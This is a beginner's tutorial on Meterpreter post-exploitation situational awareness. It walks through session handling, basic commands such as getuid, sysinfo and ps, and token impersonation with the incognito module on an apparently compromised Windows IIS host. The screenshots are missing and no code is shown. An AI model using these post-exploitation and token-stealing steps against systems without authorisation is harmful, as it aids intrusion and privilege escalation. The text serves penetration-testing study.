meterpreter awareness
TRANSCRIPT
haydz | Security | April 26, 2015
Meterpreter and situational awareness
AKA WHAT COMMANDS CAN I USE WITH METERPRETER
PAGE 1
Contents
Introduction ................................................................................................................................................... 2
Assumptions: .......................................................................................................................................... 2
Basics: What is Meterpreter ......................................................................................................................... 2
What does that mean? .............................................................................................................................. 2
In Summary ................................................................................................................................................ 3
Upon receiving a Meterpreter session: ........................................................................................................ 3
We must therefore find the session that we wish to interact with: .................................................... 4
To access the Metepreter session” .......................................................................................................... 4
Situational awareness................................................................................................................................... 4
Some easy to use Meterpreter commands: ............................................................................................ 4
Getuid ..................................................................................................................................................... 4
sysinfo .................................................................................................................................................... 4
Cat ........................................................................................................................................................... 5
Pwd .......................................................................................................................................................... 5
But Meterpter is not a terminal access? .................................................................................................. 5
Back to situational awareness ..................................................................................................................... 6
We are currently running as the svchost.exe process in a temp directory. ........................................ 6
In summary ............................................................................................................................................... 6
Tokens, what is this about tokens ............................................................................................................... 7
How do I find out what token I have? ..................................................................................................... 7
Getuid ...................................................................................................................................................... 7
Incognito ................................................................................................................................................. 7
Incognito ................................................................................................................................................. 7
Use incognito ............................................................................................................................................. 7
List_token –u ......................................................................................................................................... 8
Attempt to IMPERSONATE WITH incognito ....................................................................................... 8
Impersonate_token ............................................................................................................................... 8
Conclusion .................................................................................................................................................... 9
PAGE 2
Introduction
This report is to explain some key commands within Meterpreter that allow you to have some sort
of situational awareness. That is, how to gain more insight into system information, the user you
currently are and what processes are running among other things.
Effectively this is a rehash of information already out there, it helps me learn it if I write about it
and hopefully it helps others to learn as well.
Assumptions:
I am taking the assumption that the reader has some prior knowledge/experience with the
Metasploit Framework in launching payloads and creating listeners, as well as basic information
security terminology.
Basics: What is Meterpreter
If you are into pentesting/hacking you may have heard of Meterpreter or have used it. But what
exactly is it.
Meterpreter in its most basic form is a shell/command line access tool. It may be in the form of a
reverse or bind shell, but with many amazing options. It is simple to use and hard to master.
The definition from Offensive Security:
WHAT DOES THAT MEAN?
A Payload:
In computer security it refers to the part of an exploit/malware that performs the
malicious action. The data that is sent via the exploit. It performs the attacker’s
intentions, such as gaining system information or looking around directories.
PAGE 3
DLL injection:
Running code within the address space of another process. Meterpreter runs inside
other processes such as svchost.exe or calc.exe
Staged:
The initial Meterpreter session is created, but different modules/stages can be
added to allow different functionality as needed.
IN SUMMARY
So from that we can gather that Meterpreter is something we deliver via exploiting a vulnerability
and gain commands to execute via running inside a process that is already running on the victims
computer. Additionally, we can then add more functionality if needed.
Upon receiving a Meterpreter session:
Upon receiving a Meterpreter session, depending on how you have set up your Metasploit listen, it
may automatically jump into the Meterpreter session or it may not.
If it has not loaded the session automatically you will need to interactively open the sessions
It may look like the following:
The session has been created but is running as a background job.
PAGE 4
WE MUST THEREFORE FIND THE SESSION THAT WE WISH TO INTERACT WITH:
As we can see in the above when we type sessions, the Metasploit handler will list the sessions for
us. In this case session 1 has our win32 Meterpreter sessions.
TO ACCESS THE METEPRETER SESSION”
We simply type sessions –i and the session number
The –i flag is to interactive with the session number you provide.
Situational awareness
So we now have a session on our victim’s machine. Where to from here? Well before we try any
privilege escalation, let’s see who we are, where we are and all sorts of goodness.
Mudge is well known red teamer and has a great blog post regarding situational awareness post
here.
The idea of situation awareness is to understand what access you have, that is what you can and
cannot do. Can you add a user in order to access a box via rdesktop? Can you run executables in
order to dump passwords?
SOME EASY TO USE METERPRETER COMMANDS:
Getuid
Will show the user you are active as
sysinfo
Will print out system information, similar to an ipconfig command but with extra
information, including the Computer name
PAGE 5
Cat
Will read a file
Pwd
Will print the current directory you are working
Examples of using the commands:
BUT METERPTER IS NOT A TERMINAL ACCESS?
Well, it is but it isn’t. You can drop down into a typical shell to gain normal command line access.
Meterpreter lives within another process allowing you to drop the shell/command line access and
bring it up when needed, it allows more functionality.
To drop into a shell/command line access:
PAGE 6
Back to situational awareness
Meterpreter runs as a process, so what process am I? Here comes the getpid command
PID 1748, wow that’s helpful?? In order to understand the process we are running as we need to list
the processes that the current machine/session is running
We then need to run the PS command to list all processes running and find our Process ID.
WE ARE CURRENTLY RUNNING AS THE SVCHOST.EXE PROCESS IN A TEMP
DIRECTORY.
Based on the fact we are running in a temp directory we could assume most appropriately that we have very
little privileges, as it turn out on this machine we are running as an IWAM account. This account is a default
account with very little privilege created from an installation of IIS 5.1 or prior.
IN SUMMARY
We understand that we are most likely a low level user running out of a temp directory.
We understand the system information, the operating system and computer name.
PAGE 7
Tokens, what is this about tokens
In windows the simple idea is that each process and thread has a token associated with it. This is
just stating which user the process is associated with and if necessary which subset of the user’s
rights the process has. Therefore knowing which token you have allows you better insight into
understand your access.
For example a user token allows you to do things that a normal use has rights to, this may be to run
allowed programs but not download and install programs (if in an enterprise environment). A
system token allows one to have system access and allows complete control over the victim’s
machine.
As this report is about privilege escalation we are assuming you do not have a system token.
HOW DO I FIND OUT WHAT TOKEN I HAVE?
The two ways I know, are to use getuid and incognito.
Getuid
Will simply list the username
Incognito
Is extra functionality that allows an attacker to impersonate a user token, it
includes finding your current token.
Incognito
The aim is to impersonate a valid token on the system in order to gain more privileged access. The
aim is to impersonate a valid token on the system in order to gain more privileged access.
In order to use the functionality that incognito brings, we must load the module:
USE INCOGNITO
This will load the incognito module for us
PAGE 8
In order to attempt to steal tokens, we need to see if we have access to any tokens.
List_token –u
This will list all tokens by unique user name
From this, we are able to see IUSR_<uname> tokens. Which after googling is just a similar account
with similar limited privileges.
The Microsoft documentation regarding IIS accounts is here. Which tells us that:
“Internet Guest Account (IUSR_<computername>)
The Internet Guest account is used for anonymous access to management points.”
So we can see the tokens of a guest account which would appear not helpful at this time.
ATTEMPT TO IMPERSONATE WITH INCOGNITO
Impersonate_token
This command will attempt to impersonate the specified token, allowing us to hopefully execute
commands from then on with then access the token gives.
Meterpreter informs us that we were successful in impersonating the token. However if we use the
getuid command we can see that we are still using the ID of the same account. For an unknown
reason the success was reported incorrectly.
PAGE 9
I write up via Metasploit unleashed shows successfully impersonating a System token.
Conclusion
These are some fun techniques I have played with while being stuck as an IIS guest account.
The idea is to understand where you are and what you can do and then hopefully move laterally or
vertically to get to system access.